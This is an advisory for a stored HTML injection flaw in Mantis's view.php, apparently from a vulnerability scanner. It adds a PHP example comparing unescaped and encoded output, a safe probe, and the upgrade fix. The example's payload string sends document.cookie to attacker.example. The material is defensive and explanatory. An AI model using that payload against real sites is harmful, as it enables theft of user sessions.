
Mantis < 0.19.5 / 1.0.0 RC5 view.php HTML Injection

High

Synopsis

The remote host is vulnerable to an HTML injection attack.

Description

The remote host appears to be running Mantis, a bug tracker web application written in PHP. According to its version number, the installation is affected by a persistent HTML injection vulnerability: versions prior to 0.19.5 and 1.0.0 RC5 are reported not to adequately encode user-supplied data before the 'view.php' script includes it in its output, so a value stored by one user is rendered unescaped to every user who later views it. An attacker needs only the ability to send HTTP requests to the 'view.php' script to exploit this flaw. Successful exploitation results in attacker-controlled HTML and script being executed within the browsers of other Mantis users, which can be used to steal their session cookies or perform actions with their privileges.
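To make the flaw class concrete, the following is an added illustration written for this page; it is not Mantis source code and not the vendor's patch. It shows a stored value being echoed into HTML the way a vulnerable page would, beside the encoded form that prevents the injection. The field name, the stored payload and the rendering functions are all assumed for the example, since the advisory does not identify which field 'view.php' mishandled.

```php
<?php
declare(strict_types=1);

// Added example (not Mantis code). The field name and payload are constructed.

// A value an attacker could have stored earlier through the tracker's own forms.
// Because it is persisted, it is served to everyone who views the record.
$storedSummary = '<img src=x onerror="document.location=\'http://attacker.example/?c=\'+document.cookie">';

// Vulnerable rendering: untrusted data concatenated straight into the HTML body.
function render_vulnerable(string $value): string
{
    return '<td>' . $value . '</td>';
}

// Hardened rendering for the HTML text context: encode every metacharacter
// before output. ENT_QUOTES also encodes single quotes, ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently turning the whole string into an empty one.
function encode_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $value): string
{
    return '<td>' . encode_html($value) . '</td>';
}

// Attribute context: the same encoding, and the attribute value must be quoted,
// otherwise a space in the data ends the attribute and starts a new one.
function render_attribute(string $value): string
{
    return '<input type="text" name="summary" value="' . encode_html($value) . '">';
}

echo 'vulnerable: ' . render_vulnerable($storedSummary) . PHP_EOL;
echo 'hardened:   ' . render_hardened($storedSummary) . PHP_EOL;
echo 'attribute:  ' . render_attribute($storedSummary) . PHP_EOL;

// Self-check: no raw tag or unencoded quote may survive the hardened path.
$hardened = render_hardened($storedSummary);
if (strpos($hardened, '<img') !== false || strpos($hardened, 'onerror="') !== false) {
    fwrite(STDERR, "encoding failed\n");
    exit(1);
}
echo 'self-check passed' . PHP_EOL;
```

Run it with `php example.php`; the first line shows the tag reaching the browser intact, the second shows it rendered as literal text. The same idea gives a safe manual check for a deployed tracker once you have an account: store a harmless marker such as `<b>probe</b>` in a field that 'view.php' displays and confirm the response carries it as `&lt;b&gt;probe&lt;/b&gt;` rather than as a live tag.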

Solution

Upgrade to version 0.19.5, 1.0.0 RC5 or higher.